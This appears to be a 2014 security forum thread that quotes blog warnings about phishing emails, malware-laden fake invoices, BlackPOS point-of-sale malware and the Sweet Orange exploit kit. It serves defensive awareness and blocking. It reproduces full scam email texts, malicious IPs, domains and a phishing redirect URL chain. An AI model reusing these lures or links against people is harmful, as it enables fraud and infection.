Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/phish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."
176.74.28.254: https://www.virustotal.com/en/ip-address/176.74.28.254/information/
netflix-ssl .net / 92.222.121.100: https://www.virustotal.com/en/ip-address/92.222.121.100/information/
8.31.2014 9:02AM EDT
___
Internet Disconnection SCAM calls
- http://www.hoax-slayer.com/telstra-tech-support-scam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___
Fake Refund email targets UK taxpayers
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-refund-mail-targets-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HRMC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov.uk/security/reporting.htm
___
New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-system-breaches.pdf
___
Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquirer.net/inquirer/news/2362576/microsoft-boots-1-500-apps-from-its-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows.com/buildingapps/2014/08/27/how-were-addressing-misleading-apps-in-windows-store/
:fear: :mad:
AplusWebMaster
2014-09-01, 13:00
FYI...
Tesco Phish ...
- http://myonlinesecurity.co.uk/tesco-payback-rewards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
Tesco Customer Satisfaction program selected you to take part in our quick survey.
To earn your 150 £ reward, please click here and complete the form.
Screenshots:
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards1.png
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___
Fake Statement SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-01092014-fake-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, As far as we can determine they have not been hacked or their website or email system compromised... Email reads:
Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.
1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dd96f70183fd6f9482243e04b02a75c66040bafa64f612aebc99b4302709f1d7/analysis/1409570924/
___
O/S Market Share - August 2014 ...
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
9/1/2014
___
China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.com/article/2014/09/01/us-china-antitrust-microsoft-idUSKBN0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."
:mad: :fear:
AplusWebMaster
2014-09-02, 14:01
FYI...
Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo.com/2014/09/something-evil-on-95163121188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimates ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-traffic-analysis.net/2014/08/29/index.html
** http://blog.dynamoo.com/search/label/DINETHOSTING
> https://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack
"... automated iframe obfuscating services for use in web injections. The iframes are -injected- into high-traffic-volume websites and force the users of the websites to visit end points that serve exploits carrying malware..."
___
Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecurity.co.uk/automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:
Attempting to contact <REDACTED>
This is automated draw #23851
Our system shows you have been awarded with £1000!
According to our records, voucher wasn’t collected yet
Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
Confirm your email here to claim your £1000 voucher.
Have fun !
Lindsey Lane
CRM Manager..
* This offer is available to new players only.
You have received this email because you have requested more information from BonusNews...
Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustotal.com/en/file/a615d125ab7423f6c89e5074ed42e568a898f3beab6c3c3c174f417c54529f89/analysis/
___
Hacks behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.org/story/14/09/01/2213202/hackers-behind-biggest-ever-password-theft-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.namecheap.com/blog/2014/09/01/urgent-security-warning-may-affect-internet-users/
:mad: :fear:
AplusWebMaster
2014-09-03, 13:44
FYI...
Fake NDR SPAM - PDF malware
- http://myonlinesecurity.co.uk/ndr-bill-fake-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details. – If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...
3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5d7a2618d95f21ab31cdea298dcb9b57739c0432acaad2167d2651538517c808/analysis/1409725854/
- http://blog.dynamoo.com/2014/09/fake-westlothiangovuk-ndr-bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
From: Ebilling [Ebilling@ westlothian .gov.uk]
Date: 3 September 2014 09:20
Subject: NDR Bill
Please find attached your Non Domestic Rates bill...
Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165 ..."
(More at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/b9a54ef4f769068af029aa7941c464990c476911180c9f4ec3379ab3b51ff5b3/analysis/1409733696/
** https://www.virustotal.com/en-gb/file/960ed795dca89e50745251adf6712719a1af1aa5fd1a66c9424c777574180548/analysis/1409734574/
___
“YouTube Account Manager has sent you a Message…”
- https://blog.malwarebytes.org/fraud-scam/2014/09/youtube-account-manager-has-sent-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:
YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.
* If you decide to ignore this message and not follow the above steps your account will be suspended.
This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwarebytes.org/wp-content/uploads/2014/09/ytaccountmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___
Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecurity.co.uk/transaction-via-internet-free-charge-idi613410_745-fake-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activityA number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co .uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...
3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cdbf146c2e551614c0f66b700b36236afdb6edb66c91e29b8da79037e3513d5e/analysis/1409750135/
___
Fake attached CBE form SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-review-attached-cbe-form-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
Importat message, read right away.
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team
3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/415616d596d105b6b7063dda97c25411747c4b7fe9543d8a9214483be7bd2675/analysis/1409761379/
___
Fake 'August report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/august-report-fake-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager
This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409724912/
___
Fake Sky .com SPAM ...
- http://blog.dynamoo.com/2014/09/skycom-statement-of-account-spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
Date: Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for August, invoice as this is now due for payment.
Regards,
Clark ...
The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustotal.com/en-gb/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409736793/
___
Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-important-documents-fake-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> the name of sender at RBS appears to be random and can be any name is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
[RBS Logo Image]
Building tomorrow
RE: Important Information
We’re letting you know we have received a request from your bank to complete and sign the attached documents.
To view/download the documents please click here.
Please fill out the documents and fax them at +44 131 242 0017
Simon Leiman
Senior Accounting Manager
Tel. +44 131 242 0017
Email: Simon.Leiman@ rbs .com
? Royal Bank of Scotland 2014 ...
3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35492a48e63c523aec07cae081645dbad07680916f6cfac51f34dcdde41c0822/analysis/
___
iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmicro.com/trendlabs-security-intelligence/icloud-hacking-leak-now-being-used-as-social-engineering-lure/
Sep 3, 2014 - "... it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet spots a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencetweet.png
Website with offered video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencevideoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencefacebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files as part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___
'Infrastructure-configuration' adjustment
- http://www.reuters.com/article/2014/09/03/us-facebook-outages-idUSKBN0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."
:mad: :fear:
AplusWebMaster
2014-09-04, 15:10
FYI...
Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo.com/2014/09/sagecouk-invoice7104304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
From: Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
Date: 23 July 2014 10:31
Subject: FW: Invoice_7104304
Please see attached copy of the original invoice (Invoice_7104304).
Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo.com/2014/09/companies-house-ar01-annual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.
Screenshot: https://4.bp.blogspot.com/-ye6yNCTxN5k/VAhC_lNqhQI/AAAAAAAAFjc/azWsv0o1st0/s1600/companies-house-5.png
Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustotal.com/en-gb/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/
- http://myonlinesecurity.co.uk/fw-invoice_5294370-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustotal.com/en/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/1409823534/
___
Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecurity.co.uk/unauthorised-itunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
My Apple ID
It looks like someone used your data to make unverified purchase.
We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
Thank you.
Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."
111.90.144.179: https://www.virustotal.com/en-gb/ip-address/111.90.144.179/information/
:mad: :fear::fear:
AplusWebMaster
2014-09-05, 14:42
FYI...
Phishing safety ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-safety-is-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/legvsphishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.” Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/boagreenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to give enter credentials and personal identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Affected-Countries-01.jpg ..."
___
Hoax email comes with malicious Word doc
- http://blog.dynamoo.com/2014/09/shakira-death-hoax-email-comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro... translates as:
Shakira dies in serious accident
This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost herlife. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.
When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspot.com/-Fl3B4-2DtGs/VAnGpyytNwI/AAAAAAAAFjw/tAwTQGZ3IR8/s1600/shakira.png
The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
